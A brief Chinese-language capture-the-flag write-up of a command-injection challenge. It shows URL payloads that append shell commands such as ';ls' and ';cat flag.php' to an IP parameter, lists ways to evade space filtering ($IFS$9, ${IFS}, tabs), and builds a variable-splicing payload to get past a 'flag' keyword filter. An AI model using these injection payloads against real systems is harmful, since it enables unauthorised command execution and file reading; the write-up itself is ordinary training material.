打开题目,emm我们试试用get方式提交一下
用url/?id=127.0.0.1;ls
查看一波flag,url/?id=127.0.0.1;cat flag.php
???貌似过滤掉了,那我们看看index.php
好像是把空格过滤掉了,这里我用了很多方法进行绕过,发现只有第四种可以绕过
1、<>
2、%20(space)
3、%09(tab)
4、$IFS$9、 ${IFS}、$IFS
这里好像也把flag给过滤了,我们去看看index.php
发现过滤了很多东西,好在看到了最后一个$a变量,
构造payload:
/?ip=127.0.0.1;a=g;cat$IFS$9fla$a.php
貌似没啥用,卡了半天,发现在源码里。